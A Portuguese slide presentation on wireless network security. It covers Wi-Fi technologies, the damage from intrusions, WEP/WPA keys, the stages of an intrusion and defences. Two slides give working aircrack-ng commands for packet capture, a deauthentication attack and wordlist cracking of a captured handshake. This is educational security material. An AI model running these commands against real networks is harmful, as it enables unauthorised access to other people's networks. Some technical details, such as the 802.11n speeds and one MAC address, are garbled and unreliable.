Este documento discute segurança em redes sem fio, descrevendo as tecnologias sem fio, os riscos de invasão, como invasões ocorrem e como proteger uma rede. Ele fornece detalhes sobre ferramentas e técnicas usadas por invasores e recomendações para defender uma rede, incluindo criptografia forte, senhas seguras e monitoramento.
Segurança em redes sem fio: proteja-se de invasões
1. SEGURANÇA EM REDES
SEM FIO
Tudo que você precisa saber para proteger a sua rede
Daniel Arcelino
Joselino Santos
Fábio
Marinho
2. TÓPICOS
• Introdução
• Tecnologias das redes sem fio
• Prejuízos pós-invasão
• Tipos de chaves
• Etapas da invasão
• Ferramentas utilizadas na invasão
• Mecanismos de defesa
• Advertências
• Conclusão
• Referências
3. INTRODUÇÃO
• Usamos o termo wireless para descrever redes sem fio
• O mundo ultrapassará 7 bilhões de dispositivos móveis em 2013
• Redes sem fio oferecem mobilidade, praticidade e flexibilidade
• A maioria dos modems ADSL atuais possuem roteador sem fio
• O roteador que disponibiliza a rede sem fio através de uma antena
chama-se Acces point ou ponto de acesso
• Atualmente é possível transformar até mesmo um smartphone em
um Roteador sem fio com o recurso ancorar
4. TECNOLOGIAS
Infravermelho
Wi-fi (Wireless Fidelity)
Bluetooth (Cada vez mais presente em celulares e Notebooks)
3G
Wimax (Banda larga sem fio)
As normas são definidas pelo protocolo 802.11
Disponível nos padrões:
Padrão Velocidade
802.11b 11 Mb
802.11a 54 Mb
802.11n 11 - 54 Mb
802.11g 54 Mb
6. DESVANTAGENS
• A maioria dos pontos de acesso usam antenas baratas reduzindo o
alcance
• O sinal pode ser capturado por uma antena de maior alcance
• Não há formas de impedir que o sinal se propague livremente
• Velocidade limitada de acordo com o ambiente
7. PREJUÍZOS PÓS-INVASÃO
• Uso indevido e desautorizado da rede
• Acesso desautorizado a dados e roubo de informações
• Divulgação de informação confidencial
• Interrupção de serviço
• Implicações legais
• Utilização de banda
• Uso da rede invadida como fonte de bots
• Envio de spam
• Download de software ilegal
• Difusão de pirataria
• Disseminação de vírus, spyware e trojans etc.
8. TIPOS DE CHAVES
• WEP
• Fácil de quebrar
• WPA
• Chaves dinâmicas
• Verificação de usuários
• Criptografia forte (AES)
• WPA 2
• EAP
9. ETAPAS DA INVASÃO
• Localização da rede
• Coleta de informações
• Varredura
• Quebra da senha
• Deleção dos rastros
10. O QUE É NECESSÁRIO
Equipamento Interface Wi-fi
• PC Desktop
• Notebook
• Smartphone
• Placa de rede wi-fi
• Adaptador USB para wireless ou blutooth
• Cartão PCMCIA
• Interface iterna
• Antena de longo alcance
11. O QUE É NECESSÁRIO
• Kismet
• Usado para checar a segurança da rede
• Checar a presença de outras redes próximas
• Invadir redes
• Modo monitor indetectável
• Aircrack
• O melhor software para varredura e quebra de redes sem fio
• Possui todas as ferramentas necessárias para a invasão
• Ferramentas airodump-ng, aircrack, aireplay-ng
• Airsnort
• Distribuição Backtrack
• Uma distribuição Linux completa para testar a segurança da rede e praticar
12. MECANISMOS DE DEFESA
• Encriptar toda a transmissão com WPA 2
• Senhas fortes
• Exemplo: S39uRan$43WrEd3$$3wF!0
• Lista de endereços MAC autorizados ao acesso
• Desativar o SSID
• Trocar a senha padrão do roteador ou access point
• Desabilitar os compartilhamentos desnecessários
• Use um Firewall seguro e bem configurado
• Monitoramento eficiente
• Exemplos: Nmap
13. ADVERTÊNCIAS
• Utilize as técnicas aqui descritas apenas para garantir a segurança
da sua rede
• Existem diversas leis que punem os crimes de violação de dados
e de privacidade, etc
• Nosso grupo não se responsabiliza pelo mal uso das técnicas aqui
descritas
• Com o conhecimento vem a responsabilidade
14. TESTE PRÁTICO AIRCRACK
• Sistema: Distribuição Backtrack 5
• Hardware: Netbook Asus com Intel Celeron 900 Mhz, 1GB de RAM
• Ferramenta: Aircrack
#airodump-ng wlan0
#airodump-ng wlan0 –-bssid 00:6B:CC:48:D3:f7 –-channel 6
#airodump-ng wlan0 –w pacotes_rede –-bssid
00:6B:CC:48:D3:f7 –-channel 6
#aireplay-ng –deauth 1 wlan0 –a 00:6B:CC:48:D3:f7 –c
64:7f:yt:35:j9:w8
Interface
AP
Quantidade de estações desautenticadas AP Estação
15. TESTE PRÁTICO AIRCRACK
#aircrack-ng -e GVT -w wordListBrasil.txt /var/gvt-01.cap
SSID
Word list encontrados facilmente
na internet
Pacotes capturados pelo airodump
16. CONCLUSÃO
• A tendência das redes sem fio é cada vez maior
• Não existe rede 100% segura
• Novas tecnologias são criadas e consequentemente novos métodos
de burlá-las
17. REFERÊNCIAS
MURILO NELSON Ataques à redes sem fio. disponivel em 05/10/2004
TI Safe Segurança em redes sem fio. disponivel em Março de 2010
MARCO AURÉLIO THOMPSON Curso de hacker.
CARLOS E. MORIMOTO Redes guia prático. 2.ed Porto Alegre, Sul
Editores 2011